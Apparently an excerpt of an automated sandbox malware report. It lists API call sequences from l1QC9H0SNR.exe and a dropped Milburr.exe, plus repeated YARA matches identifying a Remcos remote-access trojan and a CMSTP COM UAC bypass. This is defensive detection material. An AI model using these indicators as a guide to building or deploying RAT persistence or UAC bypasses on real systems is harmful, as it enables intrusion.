                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W, 2_2_006C1287
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient, 2_2_006C1290
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074D3B8 NtdllDialogWndProc_W, 2_2_0074D3B8
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W, 2_2_0074D43E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C167D NtdllDialogWndProc_W, 2_2_006C167D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C16DE GetParent,NtdllDialogWndProc_W, 2_2_006C16DE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C16B5 NtdllDialogWndProc_W, 2_2_006C16B5
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074D78C NtdllDialogWndProc_W, 2_2_0074D78C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C189B NtdllDialogWndProc_W, 2_2_006C189B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074BC5D NtdllDialogWndProc_W,CallWindowProcW, 2_2_0074BC5D
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074BF30 NtdllDialogWndProc_W, 2_2_0074BF30
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0074BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W, 2_2_0074BF8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle, 5_2_0041ACC1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle, 5_2_0041ACED
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BBA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00BBA1EF
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BA8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle, 0_2_00BA8310
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BB51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00BB51BD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 2_2_004158B9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_007251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 2_2_007251BD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 5_2_004158B9
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B7D975 0_2_00B7D975
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B721C5 0_2_00B721C5
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B862D2 0_2_00B862D2
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BD03DA 0_2_00BD03DA
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B8242E 0_2_00B8242E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B725FA 0_2_00B725FA
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B5E6A0 0_2_00B5E6A0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B666E1 0_2_00B666E1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BAE616 0_2_00BAE616
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B8878F 0_2_00B8878F
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BB8889 0_2_00BB8889
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B68808 0_2_00B68808
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BD0857 0_2_00BD0857
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B86844 0_2_00B86844
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B7CB21 0_2_00B7CB21
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B86DB6 0_2_00B86DB6
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B66F9E 0_2_00B66F9E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B63030 0_2_00B63030
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B73187 0_2_00B73187
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B7F1D9 0_2_00B7F1D9
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B51287 0_2_00B51287
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B71484 0_2_00B71484
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B65520 0_2_00B65520
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B77696 0_2_00B77696
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B65760 0_2_00B65760
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B71978 0_2_00B71978
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B89AB5 0_2_00B89AB5
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B5FCE0 0_2_00B5FCE0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B7BDA6 0_2_00B7BDA6
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B71D90 0_2_00B71D90
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00BD7DDB 0_2_00BD7DDB
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B63FE0 0_2_00B63FE0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_00B5DF00 0_2_00B5DF00
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: 0_2_0100ACB0 0_2_0100ACB0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0041D071 2_2_0041D071
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_004520D2 2_2_004520D2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0043D098 2_2_0043D098
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00437150 2_2_00437150
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_004361AA 2_2_004361AA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00426254 2_2_00426254
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00431377 2_2_00431377
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0041E5DF 2_2_0041E5DF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0044C739 2_2_0044C739
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_004267CB 2_2_004267CB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0043C9DD 2_2_0043C9DD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00432A49 2_2_00432A49
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0043CC0C 2_2_0043CC0C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00434D22 2_2_00434D22
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00426E73 2_2_00426E73
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00440E20 2_2_00440E20
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0043CE3B 2_2_0043CE3B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00412F45 2_2_00412F45
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00452F00 2_2_00452F00
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00426FAD 2_2_00426FAD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006ED975 2_2_006ED975
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E21C5 2_2_006E21C5
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006F62D2 2_2_006F62D2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_007403DA 2_2_007403DA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006F242E 2_2_006F242E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E25FA 2_2_006E25FA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_0071E616 2_2_0071E616
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D66E1 2_2_006D66E1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006CE6A0 2_2_006CE6A0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006F878F 2_2_006F878F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00740857 2_2_00740857
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006F6844 2_2_006F6844
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D8808 2_2_006D8808
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00728889 2_2_00728889
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006ECB21 2_2_006ECB21
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006F6DB6 2_2_006F6DB6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D6F9E 2_2_006D6F9E
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D3030 2_2_006D3030
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006EF1D9 2_2_006EF1D9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E3187 2_2_006E3187
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006C1287 2_2_006C1287
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E1484 2_2_006E1484
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D5520 2_2_006D5520
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E7696 2_2_006E7696
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D5760 2_2_006D5760
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E1978 2_2_006E1978
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006F9AB5 2_2_006F9AB5
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006CFCE0 2_2_006CFCE0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_00747DDB 2_2_00747DDB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006EBDA6 2_2_006EBDA6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006E1D90 2_2_006E1D90
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006CDF00 2_2_006CDF00
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_006D3FE0 2_2_006D3FE0
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 2_2_01147670 2_2_01147670
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 4_2_00F6AB68 4_2_00F6AB68
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0041D071 5_2_0041D071
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_004520D2 5_2_004520D2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0043D098 5_2_0043D098
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00437150 5_2_00437150
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_004361AA 5_2_004361AA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00426254 5_2_00426254
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00431377 5_2_00431377
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0041E5DF 5_2_0041E5DF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0044C739 5_2_0044C739
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_004267CB 5_2_004267CB
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0043C9DD 5_2_0043C9DD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00432A49 5_2_00432A49
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0043CC0C 5_2_0043CC0C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00434D22 5_2_00434D22
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00426E73 5_2_00426E73
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00440E20 5_2_00440E20
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0043CE3B 5_2_0043CE3B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00412F45 5_2_00412F45
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00452F00 5_2_00452F00
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_00426FAD 5_2_00426FAD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: 5_2_0151A328 5_2_0151A328
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: String function: 00B70AE3 appears 70 times
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: String function: 00B78900 appears 42 times
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe Code function: String function: 00B57DE1 appears 35 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00444B14 appears 56 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00404C9E appears 32 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 004020E7 appears 79 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00401E8F appears 37 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00401D64 appears 43 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00447174 appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 006E0AE3 appears 70 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 004040BB appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00401F66 appears 100 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00410D8D appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 004338A5 appears 82 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00401FAA appears 42 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00403B40 appears 44 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 006E8900 appears 42 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 006C7DE1 appears 36 times
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Code function: String function: 00433FB0 appears 110 times
                    Source: l1QC9H0SNR.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
